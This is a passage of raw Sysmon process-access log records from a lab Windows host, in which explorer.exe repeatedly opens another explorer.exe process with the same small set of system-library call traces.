System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 